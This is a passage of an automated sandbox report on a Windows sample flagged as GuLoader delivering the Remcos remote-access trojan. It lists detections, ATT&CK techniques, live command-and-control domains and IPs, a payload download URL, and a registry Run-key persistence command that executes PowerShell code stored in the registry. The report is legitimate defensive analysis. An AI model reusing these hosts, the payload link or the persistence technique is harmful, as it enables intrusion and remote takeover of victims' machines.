Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

0_2_0040338F

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\msiexec.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-MK0QHY

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Software Packing	LSASS Memory	16 System Information Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	112 Process Injection	1 DLL Side-Loading	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	11 Masquerading	NTDS	13 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Modify Registry	LSA Secrets	2 Process Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	13 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zR4aIjCuRs.exe	79%	ReversingLabs	Win32.Trojan.GuLoader
zR4aIjCuRs.exe	69%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe	79%	ReversingLabs	Win32.Trojan.GuLoader
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe	69%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
janbours92harbu04.duckdns.org	6%	Virustotal	Browse
simonastolerciuc.ro	1%	Virustotal	Browse
janbours92harbu03.duckdns.org	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Link
https://github.com/Pester/Pester4	0%	Virustotal	Browse
http://pesterbdd.com/images/Pester.png4	10%	Virustotal	Browse
http://nuget.org/NuGet.exe	0%	Virustotal	Browse
http://pesterbdd.com/images/Pester.png	9%	Virustotal	Browse
https://simonastolerciuc.ro/images/vnlXriHFWaBU97.bin	2%	Virustotal	Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal	Browse
https://aka.ms/pscore6lB	0%	Virustotal	Browse
https://contoso.com/License	0%	Virustotal	Browse
https://contoso.com/	0%	Virustotal	Browse
http://nsis.sf.net/NSIS_ErrorError	0%	Virustotal	Browse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Virustotal	Browse
https://simonastolerciuc.ro/	2%	Virustotal	Browse
https://github.com/Pester/Pester	1%	Virustotal	Browse
http://www.apache.org/licenses/LICENSE-2.0.html4	0%	Virustotal	Browse
https://nuget.org/nuget.exe	0%	Virustotal	Browse
https://contoso.com/Icon	0%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
janbours92harbu04.duckdns.org	45.74.58.7	true	true	6%, Virustotal, Browse	unknown
simonastolerciuc.ro	85.120.16.93	true	false	1%, Virustotal, Browse	unknown
janbours92harbu03.duckdns.org	192.169.69.26	true	true	9%, Virustotal, Browse	unknown
janbours92harbu007.duckdns.org	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://simonastolerciuc.ro/images/vnlXriHFWaBU97.bin	false	2%, Virustotal, Browse	unknown
q92harbu03.duckdns.org	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pesterbdd.com/images/Pester.png4	powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse	unknown
https://github.com/Pester/Pester4	powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://simonastolerciuc.ro/M	msiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binqH	msiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	false	9%, Virustotal, Browse	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crl.microsof	powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binreinsEsrblog.ervadegato.com.br/vnlXriHFWaBU97.b	msiexec.exe, 00000006.00000002.274587858838.00000000224B0000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.quovadis.bm0	powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_ErrorError	zR4aIjCuRs.exe, zR4aIjCuRs.exe.2.dr	false	0%, Virustotal, Browse	unknown
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://simonastolerciuc.ro/	msiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://www.apache.org/licenses/LICENSE-2.0.html4	powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
85.120.16.93	simonastolerciuc.ro	Romania	8708	RCS-RDS73-75DrStaicoviciRO	false
192.169.69.26	janbours92harbu03.duckdns.org	United States	23033	WOWUS	true
45.74.58.7	janbours92harbu04.duckdns.org	United States	3223	VOXILITYGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1526565
Start date and time:	2024-10-06 11:44:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zR4aIjCuRs.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@17/23@4/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 91% Number of executed functions: 92 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:47:43	API Interceptor	6x Sleep call for process: msiexec.exe modified
11:47:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tragacanth %forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)
11:47:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Tragacanth %forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
85.120.16.93	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse
192.169.69.26	SX8OLQP63C.exe	Get hash	malicious	VjW0rm, AsyncRAT, RATDispenser	Browse	yuya0415.duckdns.org:1928/Vre
	confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbs	Get hash	malicious	Unknown	Browse	servidorarquivos.duckdns.org/e/e
	oKtkBYZMWl.exe	Get hash	malicious	Unknown	Browse	csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
	oKtkBYZMWl.exe	Get hash	malicious	Unknown	Browse	csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
	http://yvtplhuqem.duckdns.org/ja/	Get hash	malicious	Unknown	Browse	yvtplhuqem.duckdns.org/ja/
	http://fqqqffcydg.duckdns.org/en/	Get hash	malicious	Unknown	Browse	fqqqffcydg.duckdns.org/en/
	http://yugdzvsqnf.duckdns.org/en/	Get hash	malicious	Unknown	Browse	yugdzvsqnf.duckdns.org/en/
	&nuevo_pedido#..vbs	Get hash	malicious	Unknown	Browse	servidorarquivos.duckdns.org/e/e
	transferencia_Hsbc.xlsx	Get hash	malicious	Unknown	Browse	servidorarquivos.duckdns.org/e/e
	http://www.secure-0fflce-o365.duckdns.org/	Get hash	malicious	Unknown	Browse	www.secure-0fflce-o365.duckdns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
janbours92harbu04.duckdns.org	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.111.244.105
	file.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.111.213.87
	New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.111.244.109
	PO-2609202412666 PNG2023-W101_pdf.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.111.244.109
	Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.111.137.137
simonastolerciuc.ro	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse	85.120.16.93
janbours92harbu03.duckdns.org	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	file.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	PO-2609202412666 PNG2023-W101_pdf.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	OriginalBLShippingDocumentsInvoiceAwbCIPL0000.bat	Get hash	malicious	Remcos, GuLoader	Browse	172.111.244.104
	waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.bat	Get hash	malicious	Remcos, GuLoader	Browse	172.111.244.104
	Bill_Of_Lading_Shipping_Documents_Invoice_Awb_CI_PL000000000000000000000.bat	Get hash	malicious	Remcos, GuLoader	Browse	79.110.49.132
	Tracking_Invoice_Awb_BL_00340434757340073972.vbs	Get hash	malicious	Remcos, GuLoader	Browse	206.123.148.200

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VOXILITYGB	5s5Ut98vVh.bat	Get hash	malicious	Unknown	Browse	172.94.3.25
	Marys Organizer 2023 Release.zip	Get hash	malicious	Remcos	Browse	45.74.48.2
	Dlr7HYI6VL.lnk	Get hash	malicious	Remcos	Browse	172.94.3.25
	MdkbG2pK4l.lnk	Get hash	malicious	Remcos	Browse	172.94.3.25
	55Ka50lb6Z.bat	Get hash	malicious	Remcos	Browse	172.94.3.25
	zz91Dcv5Kf.dll	Get hash	malicious	Remcos	Browse	172.94.9.207
	V9HUU0LCin.dll	Get hash	malicious	Remcos	Browse	172.94.9.207
	E5r67vtBtc6.exe	Get hash	malicious	Xmrig	Browse	172.94.15.211
	Miner-XMR2.exe	Get hash	malicious	Xmrig	Browse	172.94.15.211
	af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exe	Get hash	malicious	Nanocore, Remcos	Browse	104.243.242.162
WOWUS	755F2BIeBQ.exe	Get hash	malicious	Remcos	Browse	192.169.69.26
	Rty1HMelBh.exe	Get hash	malicious	Remcos	Browse	192.169.69.26
	OIQ1ybtQdW.vbs	Get hash	malicious	Remcos, PureLog Stealer	Browse	192.169.69.26
	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	https://ipfs.io/ipfs/QmUcxG9XYwfiVnjaf6ugfmt6iPHAdNuk7o3cqDa64AYtKB	Get hash	malicious	HTMLPhisher	Browse	216.176.181.165
	file.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	PO-2609202412666 PNG2023-W101_pdf.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
	Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.169.69.26
RCS-RDS73-75DrStaicoviciRO	yakov.mips.elf	Get hash	malicious	Mirai	Browse	84.232.192.12
	novo.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	79.117.211.230
	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse	85.120.16.93
	GyFcTadTZv.elf	Get hash	malicious	Mirai	Browse	5.14.220.168
	XPK8NKw7Jv.elf	Get hash	malicious	Mirai, Moobot	Browse	86.122.24.142
	SecuriteInfo.com.Win32.Sector.30.19697.26848.exe	Get hash	malicious	Sality	Browse	188.26.1.21
	i586.elf	Get hash	malicious	Unknown	Browse	188.27.149.235
	154.213.187.80-x86-2024-09-01T00_09_56.elf	Get hash	malicious	Mirai	Browse	85.123.99.223
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	82.78.55.228

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	buildz.exe	Get hash	malicious	Babuk, Djvu	Browse	85.120.16.93
	InstallSetup.exe	Get hash	malicious	Stealc	Browse	85.120.16.93
	Narudzba ACH0036173.vbe	Get hash	malicious	FormBook, GuLoader	Browse	85.120.16.93
	file.dll	Get hash	malicious	Matanbuchus	Browse	85.120.16.93
	rpedido-00035.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.120.16.93
	w2TxCv1zA8.msi	Get hash	malicious	Unknown	Browse	85.120.16.93
	RNKJUiDSbh.dll	Get hash	malicious	Unknown	Browse	85.120.16.93
	RNKJUiDSbh.dll	Get hash	malicious	Unknown	Browse	85.120.16.93
	Setup.exe	Get hash	malicious	Unknown	Browse	85.120.16.93
	App_installer32_64x.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	85.120.16.93

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_6cf0e4ec34412705f7c7679452dd618a68a4ad_6bd5dc59_60d14e17-1202-42d6-adc8-8c198509b060\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1871363138655737
Encrypted:	false
SSDEEP:	192:4AXnW8IMZmPxV2jeTADZGih2nDu76gfAIO84:nm8IMoPxV2je0feDu76gfAIO84
MD5:	9FE7CC2C0A71EC51CCE19AFA6D616E65
SHA1:	9C12B87EB514FD5D2C46AE02B9B669CE80BB4D03
SHA-256:	3ABE4A775DA7B65F8DE48CE9085991FE45E1A603AF580E7F1512D97B109E849E
SHA-512:	77EB510A7A8DAAF95F1C1F260B2639981B97E2570D7FC89C8AB171D0CABD1287FDE88A1B4418BFC73B5166AED408F13B7C77EB746321B866831D12E2070FC504
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.6.8.1.6.6.6.0.7.7.8.6.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.6.8.1.6.6.6.4.5.2.7.7.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.d.1.4.e.1.7.-.1.2.0.2.-.4.2.d.6.-.a.d.c.8.-.8.c.1.9.8.5.0.9.b.0.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.9.1.6.f.a.2.-.4.7.7.c.-.4.6.2.d.-.a.9.2.4.-.4.1.3.d.8.e.4.7.6.4.1.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.f.0.-.0.0.0.1.-.0.0.4.d.-.7.2.a.e.-.4.a.a.d.d.4.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.d.0.c.7.c.f.c.a.8.1.0.4.d.0.6.d.e.1.f.0.8.b.9.7.f.2.8.b.3.5.2.0.c.2.4.6.c.d.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_7999b5829bb6649a4591b7178c861d362cefd5f_6bd5dc59_c269668f-8d0f-4b43-9053-87429be6c60a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1867453190313875
Encrypted:	false
SSDEEP:	192:LGXnW8IM9maQHY7hjeTADZGih2nDu76rfAIO84:im8IMsaQHY7hje0feDu76rfAIO84
MD5:	B3FAB23E32E89DA13A581C68F5A5FCD6
SHA1:	6D15A5A17F7EA6C10559E97A33F25D2840360A94
SHA-256:	B431C3F4B9830723E202449FA5F0A2DD90819F21521D64E708E664210CD7F514
SHA-512:	CC8DAA323817BE8F168F0A28D5A1F4F5F7B3BDEB643FFB37F9A2B20C822CED8E42B4CA535E6AEBEFF84C8119EF486F4631F47BA7E150E82DE4A89A16AA9DA29A
Malicious:	false
